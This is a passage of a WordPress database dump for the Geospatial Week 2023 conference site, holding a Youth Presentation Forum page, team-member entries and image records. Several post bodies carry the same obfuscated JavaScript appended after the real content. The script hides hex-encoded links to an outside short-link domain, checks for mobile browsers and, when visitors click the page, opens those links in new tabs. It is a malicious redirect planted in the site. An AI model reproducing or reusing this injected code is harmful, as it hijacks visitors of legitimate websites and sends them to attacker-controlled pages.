_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Nicolas Pucino','','publish','closed','closed','','nicolas-pucino','','','2023-01-22 05:17:23','2023-01-22 05:17:23','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3634',0,'dt_team','',0),
(3635,1,'2023-01-22 05:14:56','2023-01-22 05:14:56','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"68\"][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of the event:</strong></h5>\n<p>We welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:<br />\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.<br />\n⦁ Applications of Machine Learning in Geospatial Technologies.<br />\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.<br />\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.<br />\n⦁ GIS Education and Outreach Activities.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter:</strong></h5>\n<p>We accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 05:14:56','2023-01-22 05:14:56','',3613,'https://gsw2023.com/?p=3635',0,'revision','',0),
(3636,1,'2023-01-22 05:16:51','2023-01-22 05:16:51','','m2','','inherit','open','closed','','m2-8','','','2023-01-22 05:16:51','2023-01-22 05:16:51','',3634,'https://gsw2023.com/wp-content/uploads/2023/01/m2.jpg',0,'attachment','image/jpeg',0),
(3637,1,'2023-01-22 05:20:04','2023-01-22 05:20:04','<!-- wp:paragraph -->\n<p>Website Administrator</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Yogender Yadav','','publish','closed','closed','','yogender-yadav','','','2023-01-22 05:20:08','2023-01-22 05:20:08','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3637',0,'dt_team','',0),
(3638,1,'2023-01-22 05:19:15','2023-01-22 05:19:15','','m3','','inherit','open','closed','','m3-3','','','2023-01-22 05:19:15','2023-01-22 05:19:15','',3637,'https://gsw2023.com/wp-content/uploads/2023/01/m3.jpg',0,'attachment','image/jpeg',0),
(3639,1,'2023-01-22 05:31:52','2023-01-22 05:31:52','<!-- wp:paragraph -->\n<p>Newsletter Editor in Chief</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKF